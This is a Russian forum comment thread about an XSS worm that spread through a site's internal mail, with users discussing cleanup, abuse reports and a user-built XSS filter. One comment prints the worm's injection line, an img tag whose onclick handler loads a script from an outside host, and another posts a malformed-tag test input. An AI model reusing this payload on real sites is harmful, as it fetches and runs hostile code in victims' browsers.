Что за Хабравирус!?

[mix2000]

нажимать никуда не рекомендую, кажется происходит отдача карма-голоса кому-то

[habratchanka]

нажми Ctrl+A на странице сообщения, увидишь скрытую надпись "Шутка".

[mix2000]

шутка - это про получение 100 кармы

[Zeraman]

[Vik]

самое главное - не нажимать на картинку, иначе от вашего имени отправиться такое же сообщение по всем вашим алресам в хабрапочте. простите все, кто получил его от меня :( Хабраадминистрация - пожалуйста примите меры!

[Vik]

а еще после отправки всех писем вроде как страница с хабром закрывается

[Midgard]

А вот тут сидит сама гадина... Она вроде как еще и рандомом карму плюсует :)

[uranik]

ua это Украина?

[Midgard]

Ну да :) Собственно, как говорил вирус, автор этого дела -  maxer, в профиле которого написано, что он из Украины :)

[Yeah]

А погромы будут?

[fiskus]

нет, Уганда

[Kukalyakin]

Мне уже эта херь пришла от пяти человек... Почему нет кнопки "это спам!" ?

[Vik]

и как такая кнопка в данном случае должна помочь?

[alfsoft]

Это же не спам. Это вирус :0) Так вы невинных жертв заблокируете только.

[Zeraman]

Почему нет кнопки "это вирус!" ? :)

[itinyakov]

удаляем неоткрывая

[VVBash]

Блин, я думал, после "черного властелина" хабра-разработчики таки задумались о проверке безопасности сообщений. Ан - нет, те же грабли!!! Скрипт в картинке... :(

[exelens]

не исключено, что это всё сама администрация и сделала.
Вот такой PR ход дабы напомнить всем пользователям хабра а его существовании... ИМХО глупость полная... никаких позитивных эмоций.. один негатив... когда в почту валятся 5 одинаковых писем от разных не знакомых людей.

[zencd]

задумываться можно скольку угодно. дыры будут всегда. закон жизни, @#$%^&

так что может и задумались - откуда нам знать

[mix2000]

на личную же почту еще все дублируется, уже куча мусора там, фак... :\

[itinyakov]

аха.. фак! и зачем только люди открывают сообщения.. вроде бы и хабр, а толку... %)

[mix2000]

http://maxer.habrahabr.ru/ - у меня был отдан голос за него
уже забрал

[mix2000]

хотя, его уже забанили

[Valery]

Шесть писем с вирусом получил. С утра насмешило.

[droganov]

Пользуясь случаем.... граждане, помогите протетсировать http://blog.supremedesign.ru/ на предмет наличия подобных дыр?

зы. я тут ни при чём, так совпало, двигло делаю

[droganov]

а зачем минусы? я реально полуную почту получил писем счастя!

[droganov]

Люди, не будьте стадом, я здесь ни при чём. Штуку, которая проверяет инпут на придмет наличия всякой ерунды написал реально очень крутой спец — нужно протестировать. если будет всё ок я нипишу статью как защититься раз и надолго. или даже сервис могу такой сделать.

[lovchy]

Штуку написал человек, который знает две вещи. JS и HTML. Статей по тому как этого не допустить море. Почитал бы их сначала _ты_, потом сам потестировал. И только следом, если бы решил, что есть что добавить, написал бы статью. Ни ума, ни фантазии, а туда же...

[droganov]

вы уж совсем меня за пацана держите? сервером инпут проверяется, и нет ещё ничего подобного в нашей раше

[lovchy]

А за кого мне ещё вас держать? Сверху дали полную раскладку того, _что_ вирус делает. И его полный исходник. Проверяется инпут или нет спросите у чёрного властелина ;]. Уже неделю на хабре буча о проблемах с XSS, а тут вы, герой на белом коне. Пацан, он и есть.

[droganov]

Спасибо тем кто откликнулся, для хабрян, которые (ошибочно) думают, что я таким образом пиарю отладочный домен будет сделана отдельная площадка, где можно будет тестировать XSS защиту отдельно от блога.

[droganov]

Собственно, вот фильтр — http://blog.supremedesign.ru/xss
(за сутки никто так и не справился с защитой)

Вернёте карму (sic) — напишу как сделать такой же (Суть работы фильтра в том, что стринг сперва парсится в на сервере в DOM-объект, затем все элементы, атрибуты и их содержание фильтруются согласно заданной политике. Задумано, что так надёжнее чем чистить регуляркой.)

[Dr_Zoidberg]

Создай новый аккаунт....

[droganov]

у меня уже есть эккаунт :-)

[superhabra]

> Произошла непредвиденная ошибка
> Мы постараемся устранить ошибку в кратчайшие сроки. Спасибо за понимание!

Ну-ну. Надёжность зашкаливает.

[droganov]

На отладочных серверах бывают ошибки :-) Я начал дискуссию с просьбы помочь в отладке, что здесь такого?

Вот ваша ошибка: INVALID_CHARACTER_ERR: An invalid or illegal XML character is specified.

Можете сказать что это за "character"?

Спасибо!

[superhabra]

- Утром деньги - вечером стулья.
- А можно сначала стулья?
- Можно, но деньги вперёд!

[superhabra]

честно говоря уже не помню. можете простым переборным или со сроварём, тестом автоматическим выловить много ошибок.

[droganov]

Вероятно, что Вы нажали кнопку в тот момент, когда я заливал файл с политикой (я сейчас как раз с ним работаю) он не распарсился и произошла ошибка. Попробуйте повторить запрос — ошибки быть не должно...

[superhabra]

> Произошла непредвиденная ошибка
> Мы постараемся устранить ошибку в кратчайшие сроки. Спасибо за понимание!

[droganov]

ага, вижу, сейчас я ничего не трогал...
видимо не просто текст из словаря вбивали? html-xml спецсимволя эскейпятся нормально я проверял

[superhabra]

да йопт :) некорректный xml оно не переваривает.

[droganov]

переваривает, дело в каком-то определённом символе.... если незакрытых тагов запостить, то жуёт их запросто

[droganov]

Вряд ли дело в некорректном xml... юзерпик он Ваш только так кушает: [img //onclick="if(window.HKV)return;...] > [img/]
Может быть с кодировкой чего? я сейчас добавил к песочнице форму в utf-8, попробуйте ещё разок если не сложно?

Спасибо

[droganov]

Ошибка была вызвана наличием символов возврата каретки в коде (по крайней мере именно так мне удалось воспроизвести ситуацию). Сейчас это исправлено, проверьте пожалуйста ещё раз?

Спасибо за помощь.

[superhabra]

<div- -lolz="fff\" >gg</div>

[droganov]

superhabra, спасибо за помощь. теги типа [tag -] вызывают ошибку парсера. Сейчас пока ошибку обрабатываем. Опасности она не должна представлять, однако лучше, конечно, если такие строки будут молча убираться. Над этим по-работаем.

[mix2000]

все сообщения из хабрапочты удалили, но про новые входящие теперь будет мигать вечно!? :(

[Aist]

Нет, сейчас пересчитаем непрочитанные для всех.

[mix2000]

у меня одно :)

[mix2000]

еще бы верстку поправить как-нибудь...

[alexkbs]

все еще "одно входящее"

[Aist]

Возможно, это от того, что у вас действительно есть одно сообщение (от пользователя habrahabr). Вы, наверное, просто не обращали внимания, на то, что оно у вас уже очень давно мигает

[Vox]

У меня 5 непрочитанных мигает, хотя я прочесал весь ящик и ни одного такого не нашёл.

[Aist]

А они все равно есть :) Не знаю, я могу лишь со стороны БД посмотреть и увидеть, что у вас 5 непрочитанных сообщений от одного пользователя. Может быть это глюк отображения писем в вашем ящике, не исключено...

[Vox]

А за какое число? 22 страницы лениво ещё раз просматривать ;)

[Aist]

все за 3 мая 2007

[Vox]

[BmW]

Если не сложно, обратите внимание и на меня — 2 непрочитанных сообщения. Появились в день вируса, реально ни одного не видел.

[alexkbs]

У меня вообще никаких входящих нет, а надпись - мигает.

[MaxiS]

Я прям незнаю, аж обидно у меня ни одного письма с вирусом((

[mix2000]

говорите адрес, сейчас вышелм ;)

[shalomman]

и я, и я! И мне пришлите... даже вирусы ко мне не приходят.. я одинок =(

[ashel]

Мне тоже. Это говорит о том, что у нас исключительно здравомыслящие друзья, которые не будут тыкать во всякую дрянь. =)

[mix2000]

это говорит о том, что все ваши друзья спали в это воскресное утро :)

[TiGR]

Присоединяюсь. Ежели у кого найдётся экземплярчик — скиньте и мне, пожалуйста.

[marazm]

Интересно что ответил хостер на абуз:

Укажите пожалуйста программу, расценивающую данный скрипт как
вирус. Онлайн проверки:

http://online.drweb.com/
http://www.kaspersky.ru/scanforvirus

не расценивают данный скрипт как вредоносный.
- Скрыть цитируемый текст -

Sun, Apr 13, 2008 at 02:58:54PM +0800, rt wrote:

> Здравствуйте,
>
> на http://kadabra.iatp.org.ua/habr/habr.js находится "вирус", создающий
> массу неудобств пользователям habrahabr.ru.
> Примите меры (по крайней мере удалите этот файл). Это можно и как спам
> квалифицировать.
>
> IP 77.120.97.118 ваш, поэтому и пишу вам.
>
> С уважением,
> Роман Толкачёв
> Retta Ltd.

Т.е. впринципе, я терь знаю куда такие вещи хостить.

[arthurgrishin]

Ну в какой-то степени они правы, ведь это js не попадает под стандартную классификацию вредоносных скриптов :-) Мне кажется что так ответил бы практически любой хостер.

[marazm]

А то что оно создаёт своего рода DDoS (всмысле представим сколько запросов) и что, скажем, пару раз висел хабр. Это как бы всё кибер-преступления.

У меня была идея сделать подобное на vkontakte для одного человека (т.е. против оного), но чёт забил. Кстати, vkontakte.ru ой какой дырявый.

[arthurgrishin]

Да Вы поймите, я их не защищаю! :-) Просто с таким же успехом можно им указать на любой файл, который лежит у них на серверах и попросить его(этот файл) удалить. Естественно они даже ногой не пошевелят в эту сторону. Им надо доказать что файл несёт в себе какой-то «деструктивный» код, что бы они его удалили. По первой просьбе они, конечно, ничего делать не будут.

А vkontakte.ru да, достаточно дырявый :-)

[marazm]

Да я понимаю) Это всё камни в их огород :) Если собраться и каждому отправить по сообщению на абуз ( abuse@dc.volia.com ), то может чё и выйдет. Хотя, вижу, сходит на нет весь вирус.

[mekal]

хе-хе)) "Воля"))) у меня "от них" инет, тоесть они помимо хостера, еще и провайдер. не надейтесь чтолибо от них добится, жалоб им хватает от собственных клиентов :)

[citrin]

Там хоть люди отвечают, значит не все потеряно. Есть много хостеров, которые на abuse@ не отвечают в принципе. Скорее всего им идёт такой большой поток жалоб, что они их просто не читают.

[muhas]

чуствую ся обделенным, мне хабравирус не пришел... пришли-те хоть посмотреть..

[Zeraman]

У меня тока гифка сохранилась

[JVasya]

Я дебилко :( Сначала увидела кучу писем, они оказались не доступными, написала письмо администрации, что не могу прочитать — 404-я выдается. А теперь выяснилось, что и не надо их читать.

[LokoMan]

аналогично =) Может быть у нас имунитет и из нас стоит делать противоядие? Сколько дадите за образцы моей крови?

[zencd]

расписал бы кто-нибудь (подробно) что да как было...
(если дыра "зачищена")
ни писем, ни habra.js уже нет

[Midgard]

Приходило письмо, скрин которого на первом рисунке. До нажатия на кнопку оно ничего не делало. После нажатия оно рассылало себя всем друзьям из первого/второго круга.
habra.js - выложил, предварительно немного изменив.

Ломалось все следующей строчкой: <img //onclick="if(window.HKV)return; HKV=1; var script= document.createElement('script'); if(script.setAttribute) script.setAttribute('src', 'http://kadabra.iatp.org.ua/habr/habr.js?r=0.8827674806648955'); else script.src='http://kadabra.iatp.org.ua/habr/habr.js'; document.getElementsByTagName('body')[0].appendChild(script);" src="http://kadabra.iatp.org.ua/habr/habravirus.gif">

Надеюсь, теперь этот скрипт не опасен для хабра?

[arty]

черный властелин сюда пришел из-за полностью аналогичной дырки. Есть уже два инцидента, а это тенденция ; )

[alls]

А я уж было обрадовался новой корреспонденции с хабра =)

[gudoshi]

вот это единственный облом)))

[gudoshi]

увидел в ящике письма от незнакомых людей, прошел по ссылке на страничку 404...пожал плечами, снес письма и забыл...че так расшумелись?Не в дверь же почтальоны с телеграммами звонили десять раз , с горшка, от телевизора, или с тётки снимая)))Ха:)

[BmW]

Ух, 25 собщений в почту свалилось в связи с "эпидемией", а открыть и посмотреть не получается — опоздал, все удалили :(

[Vetal4eg]

Хабро-пеар?

[nfx]

.... что я сделал: удалил без всяких вопросов в голове. береженого бог бережет.

[dmitry39]

НЛО ПРИЛЕТЕЛО И ЗАБРАЛО ВИРУСОПИСАТЕЛЯ. НЛО ОПУБЛИКОВАЛО ЭТУ ЗАПИСЬ ЗДЕСЬ!

[shadeR]

Мда, а вот только счас посмотрел и увидел что карма и хабрасила в минуса ушли. собственно все 13 полученных мной уведомлений проголосовали в "минус" мне. И чем я так не понравился им?

[amyot]

мне 22 пришло письма

[superhabra]

Невъебенно. Опять сломали (http://habrahabr.ru/blog/habraretro/41143.html почти в конце).
Мне отдному кажется что хабр писали индусы?